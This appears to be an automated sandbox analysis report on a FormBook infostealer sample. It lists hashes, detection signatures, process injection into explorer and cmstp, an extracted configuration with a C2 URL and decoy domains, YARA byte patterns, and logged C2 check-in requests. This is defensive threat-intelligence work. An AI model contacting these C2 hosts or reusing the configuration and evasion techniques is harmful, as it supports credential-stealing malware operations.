Loading ...

Play interactive tourEdit tour

Analysis Report TazxfJHRhq.exe

Overview

General Information

Sample Name:TazxfJHRhq.exe
Analysis ID:383852
MD5:f818665dd48a93c48255d3ceadf92a6e
SHA1:2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
SHA256:6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • TazxfJHRhq.exe (PID: 4736 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
    • TazxfJHRhq.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 4064 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5948 cmdline: /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        1.2.TazxfJHRhq.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.TazxfJHRhq.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Source: http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Source: http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TazxfJHRhq.exeVirustotal: Detection: 14%Perma Link
          Source: TazxfJHRhq.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.cmstp.exe.4af7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.cmstp.exe.6bd538.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: TazxfJHRhq.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmstp.pdbGCTL source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TazxfJHRhq.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop ebx1_2_00406A9B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop edi1_2_004162B4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop ebx1_1_00406A9B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop edi1_1_004162B4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop ebx4_2_00406A9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi4_2_004162B4

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.autotrafficbot.com/evpn/
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1Host: www.productsoffholland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1Host: www.markmalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1Host: www.zhuledao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1Host: www.jcernadas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1Host: www.theholisticbirthco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1Host: www.tor-one.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1Host: www.de-knutselkeet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1Host: www.autotrafficbot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1Host: www.curiosityisthecurebook.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1Host: www.usinggroovefunnels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1Host: www.cgpizza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1Host: www.physicalrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-CGN1DE GD-EMEA-DC-CGN1DE
          Source: Joe Sandbox ViewASN Name: ANONYMIZEEpikNetworkCH ANONYMIZEEpikNetworkCH
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1Host: www.productsoffholland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1Host: www.markmalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1Host: www.zhuledao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1Host: www.jcernadas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1Host: www.theholisticbirthco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1Host: www.tor-one.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1Host: www.de-knutselkeet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1Host: www.autotrafficbot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1Host: www.curiosityisthecurebook.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1Host: www.usinggroovefunnels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1Host: www.cgpizza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1Host: www.physicalrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.jamessicilia.com
